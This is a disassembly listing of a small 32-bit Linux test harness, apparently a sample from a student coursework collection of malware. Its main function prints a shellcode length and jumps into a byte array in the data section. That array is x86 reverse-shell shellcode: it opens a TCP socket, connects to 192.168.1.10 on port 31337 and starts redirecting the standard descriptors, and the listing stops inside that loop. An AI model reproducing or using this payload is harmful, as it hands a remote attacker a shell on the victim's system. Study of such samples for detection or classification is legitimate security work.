
/home/stas/Coursach/Выборки/compiled/viruses/25497:     формат файла elf32-i386


Дизассемблирование раздела .interp:

08048154 <.interp>:
 8048154:	2f                   	das    
 8048155:	6c                   	insb   (%dx),%es:(%edi)
 8048156:	69 62 2f 6c 64 2d 6c 	imul   $0x6c2d646c,0x2f(%edx),%esp
 804815d:	69 6e 75 78 2e 73 6f 	imul   $0x6f732e78,0x75(%esi),%ebp
 8048164:	2e 32 00             	xor    %cs:(%eax),%al

Дизассемблирование раздела .note.ABI-tag:

08048168 <.note.ABI-tag>:
 8048168:	04 00                	add    $0x0,%al
 804816a:	00 00                	add    %al,(%eax)
 804816c:	10 00                	adc    %al,(%eax)
 804816e:	00 00                	add    %al,(%eax)
 8048170:	01 00                	add    %eax,(%eax)
 8048172:	00 00                	add    %al,(%eax)
 8048174:	47                   	inc    %edi
 8048175:	4e                   	dec    %esi
 8048176:	55                   	push   %ebp
 8048177:	00 00                	add    %al,(%eax)
 8048179:	00 00                	add    %al,(%eax)
 804817b:	00 02                	add    %al,(%edx)
 804817d:	00 00                	add    %al,(%eax)
 804817f:	00 06                	add    %al,(%esi)
 8048181:	00 00                	add    %al,(%eax)
 8048183:	00 18                	add    %bl,(%eax)
 8048185:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .note.gnu.build-id:

08048188 <.note.gnu.build-id>:
 8048188:	04 00                	add    $0x0,%al
 804818a:	00 00                	add    %al,(%eax)
 804818c:	14 00                	adc    $0x0,%al
 804818e:	00 00                	add    %al,(%eax)
 8048190:	03 00                	add    (%eax),%eax
 8048192:	00 00                	add    %al,(%eax)
 8048194:	47                   	inc    %edi
 8048195:	4e                   	dec    %esi
 8048196:	55                   	push   %ebp
 8048197:	00 03                	add    %al,(%ebx)
 8048199:	69 38 38 e8 ae d2    	imul   $0xd2aee838,(%eax),%edi
 804819f:	c4 17                	les    (%edi),%edx
 80481a1:	67 df fd             	addr16 (bad) 
 80481a4:	db 92 d3 d9 c3 5f    	fistl  0x5fc3d9d3(%edx)
 80481aa:	6f                   	outsl  %ds:(%esi),(%dx)
 80481ab:	5a                   	pop    %edx

Дизассемблирование раздела .gnu.hash:

080481ac <.gnu.hash>:
 80481ac:	02 00                	add    (%eax),%al
 80481ae:	00 00                	add    %al,(%eax)
 80481b0:	04 00                	add    $0x0,%al
 80481b2:	00 00                	add    %al,(%eax)
 80481b4:	01 00                	add    %eax,(%eax)
 80481b6:	00 00                	add    %al,(%eax)
 80481b8:	05 00 00 00 00       	add    $0x0,%eax
 80481bd:	20 00                	and    %al,(%eax)
 80481bf:	20 00                	and    %al,(%eax)
 80481c1:	00 00                	add    %al,(%eax)
 80481c3:	00 04 00             	add    %al,(%eax,%eax,1)
 80481c6:	00 00                	add    %al,(%eax)
 80481c8:	ad                   	lods   %ds:(%esi),%eax
 80481c9:	4b                   	dec    %ebx
 80481ca:	e3 c0                	jecxz  804818c <_init-0x128>

Дизассемблирование раздела .dynsym:

080481cc <.dynsym>:
	...
 80481dc:	1a 00                	sbb    (%eax),%al
	...
 80481e6:	00 00                	add    %al,(%eax)
 80481e8:	12 00                	adc    (%eax),%al
 80481ea:	00 00                	add    %al,(%eax)
 80481ec:	33 00                	xor    (%eax),%eax
	...
 80481f6:	00 00                	add    %al,(%eax)
 80481f8:	20 00                	and    %al,(%eax)
 80481fa:	00 00                	add    %al,(%eax)
 80481fc:	21 00                	and    %eax,(%eax)
	...
 8048206:	00 00                	add    %al,(%eax)
 8048208:	12 00                	adc    (%eax),%al
 804820a:	00 00                	add    %al,(%eax)
 804820c:	0b 00                	or     (%eax),%eax
 804820e:	00 00                	add    %al,(%eax)
 8048210:	dc 84 04 08 04 00 00 	faddl  0x408(%esp,%eax,1)
 8048217:	00 11                	add    %dl,(%ecx)
 8048219:	00 0f                	add    %cl,(%edi)
	...

Дизассемблирование раздела .dynstr:

0804821c <.dynstr>:
 804821c:	00 6c 69 62          	add    %ch,0x62(%ecx,%ebp,2)
 8048220:	63 2e                	arpl   %bp,(%esi)
 8048222:	73 6f                	jae    8048293 <_init-0x21>
 8048224:	2e 36 00 5f 49       	cs add %bl,%cs:%ss:0x49(%edi)
 8048229:	4f                   	dec    %edi
 804822a:	5f                   	pop    %edi
 804822b:	73 74                	jae    80482a1 <_init-0x13>
 804822d:	64 69 6e 5f 75 73 65 	imul   $0x64657375,%fs:0x5f(%esi),%ebp
 8048234:	64 
 8048235:	00 70 72             	add    %dh,0x72(%eax)
 8048238:	69 6e 74 66 00 5f 5f 	imul   $0x5f5f0066,0x74(%esi),%ebp
 804823f:	6c                   	insb   (%dx),%es:(%edi)
 8048240:	69 62 63 5f 73 74 61 	imul   $0x6174735f,0x63(%edx),%esp
 8048247:	72 74                	jb     80482bd <_init+0x9>
 8048249:	5f                   	pop    %edi
 804824a:	6d                   	insl   (%dx),%es:(%edi)
 804824b:	61                   	popa   
 804824c:	69 6e 00 5f 5f 67 6d 	imul   $0x6d675f5f,0x0(%esi),%ebp
 8048253:	6f                   	outsl  %ds:(%esi),(%dx)
 8048254:	6e                   	outsb  %ds:(%esi),(%dx)
 8048255:	5f                   	pop    %edi
 8048256:	73 74                	jae    80482cc <_init+0x18>
 8048258:	61                   	popa   
 8048259:	72 74                	jb     80482cf <_init+0x1b>
 804825b:	5f                   	pop    %edi
 804825c:	5f                   	pop    %edi
 804825d:	00 47 4c             	add    %al,0x4c(%edi)
 8048260:	49                   	dec    %ecx
 8048261:	42                   	inc    %edx
 8048262:	43                   	inc    %ebx
 8048263:	5f                   	pop    %edi
 8048264:	32 2e                	xor    (%esi),%ch
 8048266:	30 00                	xor    %al,(%eax)

Дизассемблирование раздела .gnu.version:

08048268 <.gnu.version>:
 8048268:	00 00                	add    %al,(%eax)
 804826a:	02 00                	add    (%eax),%al
 804826c:	00 00                	add    %al,(%eax)
 804826e:	02 00                	add    (%eax),%al
 8048270:	01 00                	add    %eax,(%eax)

Дизассемблирование раздела .gnu.version_r:

08048274 <.gnu.version_r>:
 8048274:	01 00                	add    %eax,(%eax)
 8048276:	01 00                	add    %eax,(%eax)
 8048278:	01 00                	add    %eax,(%eax)
 804827a:	00 00                	add    %al,(%eax)
 804827c:	10 00                	adc    %al,(%eax)
 804827e:	00 00                	add    %al,(%eax)
 8048280:	00 00                	add    %al,(%eax)
 8048282:	00 00                	add    %al,(%eax)
 8048284:	10 69 69             	adc    %ch,0x69(%ecx)
 8048287:	0d 00 00 02 00       	or     $0x20000,%eax
 804828c:	42                   	inc    %edx
 804828d:	00 00                	add    %al,(%eax)
 804828f:	00 00                	add    %al,(%eax)
 8048291:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .rel.dyn:

08048294 <.rel.dyn>:
 8048294:	fc                   	cld    
 8048295:	9f                   	lahf   
 8048296:	04 08                	add    $0x8,%al
 8048298:	06                   	push   %es
 8048299:	02 00                	add    (%eax),%al
	...

Дизассемблирование раздела .rel.plt:

0804829c <.rel.plt>:
 804829c:	0c a0                	or     $0xa0,%al
 804829e:	04 08                	add    $0x8,%al
 80482a0:	07                   	pop    %es
 80482a1:	01 00                	add    %eax,(%eax)
 80482a3:	00 10                	add    %dl,(%eax)
 80482a5:	a0 04 08 07 02       	mov    0x2070804,%al
 80482aa:	00 00                	add    %al,(%eax)
 80482ac:	14 a0                	adc    $0xa0,%al
 80482ae:	04 08                	add    $0x8,%al
 80482b0:	07                   	pop    %es
 80482b1:	03 00                	add    (%eax),%eax
	...

Дизассемблирование раздела .init:

080482b4 <_init>:
 80482b4:	53                   	push   %ebx
 80482b5:	83 ec 08             	sub    $0x8,%esp
 80482b8:	e8 93 00 00 00       	call   8048350 <__x86.get_pc_thunk.bx>
 80482bd:	81 c3 43 1d 00 00    	add    $0x1d43,%ebx
 80482c3:	8b 83 fc ff ff ff    	mov    -0x4(%ebx),%eax
 80482c9:	85 c0                	test   %eax,%eax
 80482cb:	74 05                	je     80482d2 <_init+0x1e>
 80482cd:	e8 2e 00 00 00       	call   8048300 <__gmon_start__@plt>
 80482d2:	83 c4 08             	add    $0x8,%esp
 80482d5:	5b                   	pop    %ebx
 80482d6:	c3                   	ret    

Дизассемблирование раздела .plt:

080482e0 <printf@plt-0x10>:
 80482e0:	ff 35 04 a0 04 08    	pushl  0x804a004
 80482e6:	ff 25 08 a0 04 08    	jmp    *0x804a008
 80482ec:	00 00                	add    %al,(%eax)
	...

080482f0 <printf@plt>:
 80482f0:	ff 25 0c a0 04 08    	jmp    *0x804a00c
 80482f6:	68 00 00 00 00       	push   $0x0
 80482fb:	e9 e0 ff ff ff       	jmp    80482e0 <_init+0x2c>

08048300 <__gmon_start__@plt>:
 8048300:	ff 25 10 a0 04 08    	jmp    *0x804a010
 8048306:	68 08 00 00 00       	push   $0x8
 804830b:	e9 d0 ff ff ff       	jmp    80482e0 <_init+0x2c>

08048310 <__libc_start_main@plt>:
 8048310:	ff 25 14 a0 04 08    	jmp    *0x804a014
 8048316:	68 10 00 00 00       	push   $0x10
 804831b:	e9 c0 ff ff ff       	jmp    80482e0 <_init+0x2c>

Дизассемблирование раздела .text:

08048320 <_start>:
 8048320:	31 ed                	xor    %ebp,%ebp
 8048322:	5e                   	pop    %esi
 8048323:	89 e1                	mov    %esp,%ecx
 8048325:	83 e4 f0             	and    $0xfffffff0,%esp
 8048328:	50                   	push   %eax
 8048329:	54                   	push   %esp
 804832a:	52                   	push   %edx
 804832b:	68 c0 84 04 08       	push   $0x80484c0
 8048330:	68 50 84 04 08       	push   $0x8048450
 8048335:	51                   	push   %ecx
 8048336:	56                   	push   %esi
 8048337:	68 1d 84 04 08       	push   $0x804841d
 804833c:	e8 cf ff ff ff       	call   8048310 <__libc_start_main@plt>
 8048341:	f4                   	hlt    
 8048342:	66 90                	xchg   %ax,%ax
 8048344:	66 90                	xchg   %ax,%ax
 8048346:	66 90                	xchg   %ax,%ax
 8048348:	66 90                	xchg   %ax,%ax
 804834a:	66 90                	xchg   %ax,%ax
 804834c:	66 90                	xchg   %ax,%ax
 804834e:	66 90                	xchg   %ax,%ax

08048350 <__x86.get_pc_thunk.bx>:
 8048350:	8b 1c 24             	mov    (%esp),%ebx
 8048353:	c3                   	ret    
 8048354:	66 90                	xchg   %ax,%ax
 8048356:	66 90                	xchg   %ax,%ax
 8048358:	66 90                	xchg   %ax,%ax
 804835a:	66 90                	xchg   %ax,%ax
 804835c:	66 90                	xchg   %ax,%ax
 804835e:	66 90                	xchg   %ax,%ax

08048360 <deregister_tm_clones>:
 8048360:	b8 a3 a0 04 08       	mov    $0x804a0a3,%eax
 8048365:	2d a0 a0 04 08       	sub    $0x804a0a0,%eax
 804836a:	83 f8 06             	cmp    $0x6,%eax
 804836d:	77 01                	ja     8048370 <deregister_tm_clones+0x10>
 804836f:	c3                   	ret    
 8048370:	b8 00 00 00 00       	mov    $0x0,%eax
 8048375:	85 c0                	test   %eax,%eax
 8048377:	74 f6                	je     804836f <deregister_tm_clones+0xf>
 8048379:	55                   	push   %ebp
 804837a:	89 e5                	mov    %esp,%ebp
 804837c:	83 ec 18             	sub    $0x18,%esp
 804837f:	c7 04 24 a0 a0 04 08 	movl   $0x804a0a0,(%esp)
 8048386:	ff d0                	call   *%eax
 8048388:	c9                   	leave  
 8048389:	c3                   	ret    
 804838a:	8d b6 00 00 00 00    	lea    0x0(%esi),%esi

08048390 <register_tm_clones>:
 8048390:	b8 a0 a0 04 08       	mov    $0x804a0a0,%eax
 8048395:	2d a0 a0 04 08       	sub    $0x804a0a0,%eax
 804839a:	c1 f8 02             	sar    $0x2,%eax
 804839d:	89 c2                	mov    %eax,%edx
 804839f:	c1 ea 1f             	shr    $0x1f,%edx
 80483a2:	01 d0                	add    %edx,%eax
 80483a4:	d1 f8                	sar    %eax
 80483a6:	75 01                	jne    80483a9 <register_tm_clones+0x19>
 80483a8:	c3                   	ret    
 80483a9:	ba 00 00 00 00       	mov    $0x0,%edx
 80483ae:	85 d2                	test   %edx,%edx
 80483b0:	74 f6                	je     80483a8 <register_tm_clones+0x18>
 80483b2:	55                   	push   %ebp
 80483b3:	89 e5                	mov    %esp,%ebp
 80483b5:	83 ec 18             	sub    $0x18,%esp
 80483b8:	89 44 24 04          	mov    %eax,0x4(%esp)
 80483bc:	c7 04 24 a0 a0 04 08 	movl   $0x804a0a0,(%esp)
 80483c3:	ff d2                	call   *%edx
 80483c5:	c9                   	leave  
 80483c6:	c3                   	ret    
 80483c7:	89 f6                	mov    %esi,%esi
 80483c9:	8d bc 27 00 00 00 00 	lea    0x0(%edi,%eiz,1),%edi

080483d0 <__do_global_dtors_aux>:
 80483d0:	80 3d 9d a0 04 08 00 	cmpb   $0x0,0x804a09d
 80483d7:	75 13                	jne    80483ec <__do_global_dtors_aux+0x1c>
 80483d9:	55                   	push   %ebp
 80483da:	89 e5                	mov    %esp,%ebp
 80483dc:	83 ec 08             	sub    $0x8,%esp
 80483df:	e8 7c ff ff ff       	call   8048360 <deregister_tm_clones>
 80483e4:	c6 05 9d a0 04 08 01 	movb   $0x1,0x804a09d
 80483eb:	c9                   	leave  
 80483ec:	f3 c3                	repz ret 
 80483ee:	66 90                	xchg   %ax,%ax

080483f0 <frame_dummy>:
 80483f0:	a1 10 9f 04 08       	mov    0x8049f10,%eax
 80483f5:	85 c0                	test   %eax,%eax
 80483f7:	74 1f                	je     8048418 <frame_dummy+0x28>
 80483f9:	b8 00 00 00 00       	mov    $0x0,%eax
 80483fe:	85 c0                	test   %eax,%eax
 8048400:	74 16                	je     8048418 <frame_dummy+0x28>
 8048402:	55                   	push   %ebp
 8048403:	89 e5                	mov    %esp,%ebp
 8048405:	83 ec 18             	sub    $0x18,%esp
 8048408:	c7 04 24 10 9f 04 08 	movl   $0x8049f10,(%esp)
 804840f:	ff d0                	call   *%eax
 8048411:	c9                   	leave  
 8048412:	e9 79 ff ff ff       	jmp    8048390 <register_tm_clones>
 8048417:	90                   	nop
 8048418:	e9 73 ff ff ff       	jmp    8048390 <register_tm_clones>

0804841d <main>:
 804841d:	55                   	push   %ebp
 804841e:	89 e5                	mov    %esp,%ebp
 8048420:	83 e4 f0             	and    $0xfffffff0,%esp
 8048423:	83 ec 20             	sub    $0x20,%esp
 8048426:	c7 44 24 04 5c 00 00 	movl   $0x5c,0x4(%esp)
 804842d:	00 
 804842e:	c7 04 24 e0 84 04 08 	movl   $0x80484e0,(%esp)
 8048435:	e8 b6 fe ff ff       	call   80482f0 <printf@plt>
 804843a:	c7 44 24 1c 40 a0 04 	movl   $0x804a040,0x1c(%esp)
 8048441:	08 
 8048442:	8b 44 24 1c          	mov    0x1c(%esp),%eax
 8048446:	ff d0                	call   *%eax
 8048448:	c9                   	leave  
 8048449:	c3                   	ret    
 804844a:	66 90                	xchg   %ax,%ax
 804844c:	66 90                	xchg   %ax,%ax
 804844e:	66 90                	xchg   %ax,%ax

08048450 <__libc_csu_init>:
 8048450:	55                   	push   %ebp
 8048451:	57                   	push   %edi
 8048452:	31 ff                	xor    %edi,%edi
 8048454:	56                   	push   %esi
 8048455:	53                   	push   %ebx
 8048456:	e8 f5 fe ff ff       	call   8048350 <__x86.get_pc_thunk.bx>
 804845b:	81 c3 a5 1b 00 00    	add    $0x1ba5,%ebx
 8048461:	83 ec 1c             	sub    $0x1c,%esp
 8048464:	8b 6c 24 30          	mov    0x30(%esp),%ebp
 8048468:	8d b3 0c ff ff ff    	lea    -0xf4(%ebx),%esi
 804846e:	e8 41 fe ff ff       	call   80482b4 <_init>
 8048473:	8d 83 08 ff ff ff    	lea    -0xf8(%ebx),%eax
 8048479:	29 c6                	sub    %eax,%esi
 804847b:	c1 fe 02             	sar    $0x2,%esi
 804847e:	85 f6                	test   %esi,%esi
 8048480:	74 27                	je     80484a9 <__libc_csu_init+0x59>
 8048482:	8d b6 00 00 00 00    	lea    0x0(%esi),%esi
 8048488:	8b 44 24 38          	mov    0x38(%esp),%eax
 804848c:	89 2c 24             	mov    %ebp,(%esp)
 804848f:	89 44 24 08          	mov    %eax,0x8(%esp)
 8048493:	8b 44 24 34          	mov    0x34(%esp),%eax
 8048497:	89 44 24 04          	mov    %eax,0x4(%esp)
 804849b:	ff 94 bb 08 ff ff ff 	call   *-0xf8(%ebx,%edi,4)
 80484a2:	83 c7 01             	add    $0x1,%edi
 80484a5:	39 f7                	cmp    %esi,%edi
 80484a7:	75 df                	jne    8048488 <__libc_csu_init+0x38>
 80484a9:	83 c4 1c             	add    $0x1c,%esp
 80484ac:	5b                   	pop    %ebx
 80484ad:	5e                   	pop    %esi
 80484ae:	5f                   	pop    %edi
 80484af:	5d                   	pop    %ebp
 80484b0:	c3                   	ret    
 80484b1:	eb 0d                	jmp    80484c0 <__libc_csu_fini>
 80484b3:	90                   	nop
 80484b4:	90                   	nop
 80484b5:	90                   	nop
 80484b6:	90                   	nop
 80484b7:	90                   	nop
 80484b8:	90                   	nop
 80484b9:	90                   	nop
 80484ba:	90                   	nop
 80484bb:	90                   	nop
 80484bc:	90                   	nop
 80484bd:	90                   	nop
 80484be:	90                   	nop
 80484bf:	90                   	nop

080484c0 <__libc_csu_fini>:
 80484c0:	f3 c3                	repz ret 

Дизассемблирование раздела .fini:

080484c4 <_fini>:
 80484c4:	53                   	push   %ebx
 80484c5:	83 ec 08             	sub    $0x8,%esp
 80484c8:	e8 83 fe ff ff       	call   8048350 <__x86.get_pc_thunk.bx>
 80484cd:	81 c3 33 1b 00 00    	add    $0x1b33,%ebx
 80484d3:	83 c4 08             	add    $0x8,%esp
 80484d6:	5b                   	pop    %ebx
 80484d7:	c3                   	ret    

Дизассемблирование раздела .rodata:

080484d8 <_fp_hw>:
 80484d8:	03 00                	add    (%eax),%eax
	...

080484dc <_IO_stdin_used>:
 80484dc:	01 00                	add    %eax,(%eax)
 80484de:	02 00                	add    (%eax),%al
 80484e0:	53                   	push   %ebx
 80484e1:	68 65 6c 6c 63       	push   $0x636c6c65
 80484e6:	6f                   	outsl  %ds:(%esi),(%dx)
 80484e7:	64 65 20 4c 65 6e    	fs and %cl,%fs:%gs:0x6e(%ebp,%eiz,2)
 80484ed:	67 74 68             	addr16 je 8048558 <_IO_stdin_used+0x7c>
 80484f0:	3a 20                	cmp    (%eax),%ah
 80484f2:	25                   	.byte 0x25
 80484f3:	64 0a 00             	or     %fs:(%eax),%al

Дизассемблирование раздела .eh_frame_hdr:

080484f8 <.eh_frame_hdr>:
 80484f8:	01 1b                	add    %ebx,(%ebx)
 80484fa:	03 3b                	add    (%ebx),%edi
 80484fc:	28 00                	sub    %al,(%eax)
 80484fe:	00 00                	add    %al,(%eax)
 8048500:	04 00                	add    $0x0,%al
 8048502:	00 00                	add    %al,(%eax)
 8048504:	e8 fd ff ff 44       	call   4d048506 <__TMC_END__+0x44ffe466>
 8048509:	00 00                	add    %al,(%eax)
 804850b:	00 25 ff ff ff 68    	add    %ah,0x68ffffff
 8048511:	00 00                	add    %al,(%eax)
 8048513:	00 58 ff             	add    %bl,-0x1(%eax)
 8048516:	ff                   	(bad)  
 8048517:	ff 88 00 00 00 c8    	decl   -0x38000000(%eax)
 804851d:	ff                   	(bad)  
 804851e:	ff                   	(bad)  
 804851f:	ff c4                	inc    %esp
 8048521:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .eh_frame:

08048524 <__FRAME_END__-0xac>:
 8048524:	14 00                	adc    $0x0,%al
 8048526:	00 00                	add    %al,(%eax)
 8048528:	00 00                	add    %al,(%eax)
 804852a:	00 00                	add    %al,(%eax)
 804852c:	01 7a 52             	add    %edi,0x52(%edx)
 804852f:	00 01                	add    %al,(%ecx)
 8048531:	7c 08                	jl     804853b <_IO_stdin_used+0x5f>
 8048533:	01 1b                	add    %ebx,(%ebx)
 8048535:	0c 04                	or     $0x4,%al
 8048537:	04 88                	add    $0x88,%al
 8048539:	01 00                	add    %eax,(%eax)
 804853b:	00 20                	add    %ah,(%eax)
 804853d:	00 00                	add    %al,(%eax)
 804853f:	00 1c 00             	add    %bl,(%eax,%eax,1)
 8048542:	00 00                	add    %al,(%eax)
 8048544:	9c                   	pushf  
 8048545:	fd                   	std    
 8048546:	ff                   	(bad)  
 8048547:	ff 40 00             	incl   0x0(%eax)
 804854a:	00 00                	add    %al,(%eax)
 804854c:	00 0e                	add    %cl,(%esi)
 804854e:	08 46 0e             	or     %al,0xe(%esi)
 8048551:	0c 4a                	or     $0x4a,%al
 8048553:	0f 0b                	ud2    
 8048555:	74 04                	je     804855b <_IO_stdin_used+0x7f>
 8048557:	78 00                	js     8048559 <_IO_stdin_used+0x7d>
 8048559:	3f                   	aas    
 804855a:	1a 3b                	sbb    (%ebx),%bh
 804855c:	2a 32                	sub    (%edx),%dh
 804855e:	24 22                	and    $0x22,%al
 8048560:	1c 00                	sbb    $0x0,%al
 8048562:	00 00                	add    %al,(%eax)
 8048564:	40                   	inc    %eax
 8048565:	00 00                	add    %al,(%eax)
 8048567:	00 b5 fe ff ff 2d    	add    %dh,0x2dfffffe(%ebp)
 804856d:	00 00                	add    %al,(%eax)
 804856f:	00 00                	add    %al,(%eax)
 8048571:	41                   	inc    %ecx
 8048572:	0e                   	push   %cs
 8048573:	08 85 02 42 0d 05    	or     %al,0x50d4202(%ebp)
 8048579:	69 c5 0c 04 04 00    	imul   $0x4040c,%ebp,%eax
 804857f:	00 38                	add    %bh,(%eax)
 8048581:	00 00                	add    %al,(%eax)
 8048583:	00 60 00             	add    %ah,0x0(%eax)
 8048586:	00 00                	add    %al,(%eax)
 8048588:	c8 fe ff ff          	enter  $0xfffe,$0xff
 804858c:	61                   	popa   
 804858d:	00 00                	add    %al,(%eax)
 804858f:	00 00                	add    %al,(%eax)
 8048591:	41                   	inc    %ecx
 8048592:	0e                   	push   %cs
 8048593:	08 85 02 41 0e 0c    	or     %al,0xc0e4102(%ebp)
 8048599:	87 03                	xchg   %eax,(%ebx)
 804859b:	43                   	inc    %ebx
 804859c:	0e                   	push   %cs
 804859d:	10 86 04 41 0e 14    	adc    %al,0x140e4104(%esi)
 80485a3:	83 05 4e 0e 30 02 48 	addl   $0x48,0x2300e4e
 80485aa:	0e                   	push   %cs
 80485ab:	14 41                	adc    $0x41,%al
 80485ad:	c3                   	ret    
 80485ae:	0e                   	push   %cs
 80485af:	10 41 c6             	adc    %al,-0x3a(%ecx)
 80485b2:	0e                   	push   %cs
 80485b3:	0c 41                	or     $0x41,%al
 80485b5:	c7                   	(bad)  
 80485b6:	0e                   	push   %cs
 80485b7:	08 41 c5             	or     %al,-0x3b(%ecx)
 80485ba:	0e                   	push   %cs
 80485bb:	04 10                	add    $0x10,%al
 80485bd:	00 00                	add    %al,(%eax)
 80485bf:	00 9c 00 00 00 fc fe 	add    %bl,-0x1040000(%eax,%eax,1)
 80485c6:	ff                   	(bad)  
 80485c7:	ff 02                	incl   (%edx)
 80485c9:	00 00                	add    %al,(%eax)
 80485cb:	00 00                	add    %al,(%eax)
 80485cd:	00 00                	add    %al,(%eax)
	...

080485d0 <__FRAME_END__>:
 80485d0:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .init_array:

08049f08 <__frame_dummy_init_array_entry>:
 8049f08:	f0                   	lock
 8049f09:	83                   	.byte 0x83
 8049f0a:	04 08                	add    $0x8,%al

Дизассемблирование раздела .fini_array:

08049f0c <__do_global_dtors_aux_fini_array_entry>:
 8049f0c:	d0                   	.byte 0xd0
 8049f0d:	83                   	.byte 0x83
 8049f0e:	04 08                	add    $0x8,%al

Дизассемблирование раздела .jcr:

08049f10 <__JCR_END__>:
 8049f10:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .dynamic:

08049f14 <_DYNAMIC>:
 8049f14:	01 00                	add    %eax,(%eax)
 8049f16:	00 00                	add    %al,(%eax)
 8049f18:	01 00                	add    %eax,(%eax)
 8049f1a:	00 00                	add    %al,(%eax)
 8049f1c:	0c 00                	or     $0x0,%al
 8049f1e:	00 00                	add    %al,(%eax)
 8049f20:	b4 82                	mov    $0x82,%ah
 8049f22:	04 08                	add    $0x8,%al
 8049f24:	0d 00 00 00 c4       	or     $0xc4000000,%eax
 8049f29:	84 04 08             	test   %al,(%eax,%ecx,1)
 8049f2c:	19 00                	sbb    %eax,(%eax)
 8049f2e:	00 00                	add    %al,(%eax)
 8049f30:	08 9f 04 08 1b 00    	or     %bl,0x1b0804(%edi)
 8049f36:	00 00                	add    %al,(%eax)
 8049f38:	04 00                	add    $0x0,%al
 8049f3a:	00 00                	add    %al,(%eax)
 8049f3c:	1a 00                	sbb    (%eax),%al
 8049f3e:	00 00                	add    %al,(%eax)
 8049f40:	0c 9f                	or     $0x9f,%al
 8049f42:	04 08                	add    $0x8,%al
 8049f44:	1c 00                	sbb    $0x0,%al
 8049f46:	00 00                	add    %al,(%eax)
 8049f48:	04 00                	add    $0x0,%al
 8049f4a:	00 00                	add    %al,(%eax)
 8049f4c:	f5                   	cmc    
 8049f4d:	fe                   	(bad)  
 8049f4e:	ff 6f ac             	ljmp   *-0x54(%edi)
 8049f51:	81 04 08 05 00 00 00 	addl   $0x5,(%eax,%ecx,1)
 8049f58:	1c 82                	sbb    $0x82,%al
 8049f5a:	04 08                	add    $0x8,%al
 8049f5c:	06                   	push   %es
 8049f5d:	00 00                	add    %al,(%eax)
 8049f5f:	00 cc                	add    %cl,%ah
 8049f61:	81 04 08 0a 00 00 00 	addl   $0xa,(%eax,%ecx,1)
 8049f68:	4c                   	dec    %esp
 8049f69:	00 00                	add    %al,(%eax)
 8049f6b:	00 0b                	add    %cl,(%ebx)
 8049f6d:	00 00                	add    %al,(%eax)
 8049f6f:	00 10                	add    %dl,(%eax)
 8049f71:	00 00                	add    %al,(%eax)
 8049f73:	00 15 00 00 00 00    	add    %dl,0x0
 8049f79:	00 00                	add    %al,(%eax)
 8049f7b:	00 03                	add    %al,(%ebx)
 8049f7d:	00 00                	add    %al,(%eax)
 8049f7f:	00 00                	add    %al,(%eax)
 8049f81:	a0 04 08 02 00       	mov    0x20804,%al
 8049f86:	00 00                	add    %al,(%eax)
 8049f88:	18 00                	sbb    %al,(%eax)
 8049f8a:	00 00                	add    %al,(%eax)
 8049f8c:	14 00                	adc    $0x0,%al
 8049f8e:	00 00                	add    %al,(%eax)
 8049f90:	11 00                	adc    %eax,(%eax)
 8049f92:	00 00                	add    %al,(%eax)
 8049f94:	17                   	pop    %ss
 8049f95:	00 00                	add    %al,(%eax)
 8049f97:	00 9c 82 04 08 11 00 	add    %bl,0x110804(%edx,%eax,4)
 8049f9e:	00 00                	add    %al,(%eax)
 8049fa0:	94                   	xchg   %eax,%esp
 8049fa1:	82                   	(bad)  
 8049fa2:	04 08                	add    $0x8,%al
 8049fa4:	12 00                	adc    (%eax),%al
 8049fa6:	00 00                	add    %al,(%eax)
 8049fa8:	08 00                	or     %al,(%eax)
 8049faa:	00 00                	add    %al,(%eax)
 8049fac:	13 00                	adc    (%eax),%eax
 8049fae:	00 00                	add    %al,(%eax)
 8049fb0:	08 00                	or     %al,(%eax)
 8049fb2:	00 00                	add    %al,(%eax)
 8049fb4:	fe                   	(bad)  
 8049fb5:	ff                   	(bad)  
 8049fb6:	ff 6f 74             	ljmp   *0x74(%edi)
 8049fb9:	82                   	(bad)  
 8049fba:	04 08                	add    $0x8,%al
 8049fbc:	ff                   	(bad)  
 8049fbd:	ff                   	(bad)  
 8049fbe:	ff 6f 01             	ljmp   *0x1(%edi)
 8049fc1:	00 00                	add    %al,(%eax)
 8049fc3:	00 f0                	add    %dh,%al
 8049fc5:	ff                   	(bad)  
 8049fc6:	ff 6f 68             	ljmp   *0x68(%edi)
 8049fc9:	82                   	(bad)  
 8049fca:	04 08                	add    $0x8,%al
	...

Дизассемблирование раздела .got:

08049ffc <.got>:
 8049ffc:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .got.plt:

0804a000 <_GLOBAL_OFFSET_TABLE_>:
 804a000:	14 9f                	adc    $0x9f,%al
 804a002:	04 08                	add    $0x8,%al
	...
 804a00c:	f6 82 04 08 06 83 04 	testb  $0x4,-0x7cf9f7fc(%edx)
 804a013:	08 16                	or     %dl,(%esi)
 804a015:	83                   	.byte 0x83
 804a016:	04 08                	add    $0x8,%al

Дизассемблирование раздела .data:

0804a020 <__data_start>:
 804a020:	00 00                	add    %al,(%eax)
	...

0804a024 <__dso_handle>:
	...

0804a040 <code>:
 804a040:	31 c0                	xor    %eax,%eax
 804a042:	31 db                	xor    %ebx,%ebx
 804a044:	31 c9                	xor    %ecx,%ecx
 804a046:	31 d2                	xor    %edx,%edx
 804a048:	b0 66                	mov    $0x66,%al
 804a04a:	b3 01                	mov    $0x1,%bl
 804a04c:	51                   	push   %ecx
 804a04d:	6a 06                	push   $0x6
 804a04f:	6a 01                	push   $0x1
 804a051:	6a 02                	push   $0x2
 804a053:	89 e1                	mov    %esp,%ecx
 804a055:	cd 80                	int    $0x80
 804a057:	89 c6                	mov    %eax,%esi
 804a059:	b0 66                	mov    $0x66,%al
 804a05b:	31 db                	xor    %ebx,%ebx
 804a05d:	b3 02                	mov    $0x2,%bl
 804a05f:	68 c0 a8 01 0a       	push   $0xa01a8c0
 804a064:	66 68 7a 69          	pushw  $0x697a
 804a068:	66 53                	push   %bx
 804a06a:	fe c3                	inc    %bl
 804a06c:	89 e1                	mov    %esp,%ecx
 804a06e:	6a 10                	push   $0x10
 804a070:	51                   	push   %ecx
 804a071:	56                   	push   %esi
 804a072:	89 e1                	mov    %esp,%ecx
 804a074:	cd 80                	int    $0x80
 804a076:	31 c9                	xor    %ecx,%ecx
 804a078:	b1 03                	mov    $0x3,%cl
 804a07a:	fe c9                	dec    %cl
 804a07c:	b0 3f                	mov    $0x3f,%al
 804a07e:	cd 80                	int    $0x80
 804a080:	75 f8                	jne    804a07a <code+0x3a>
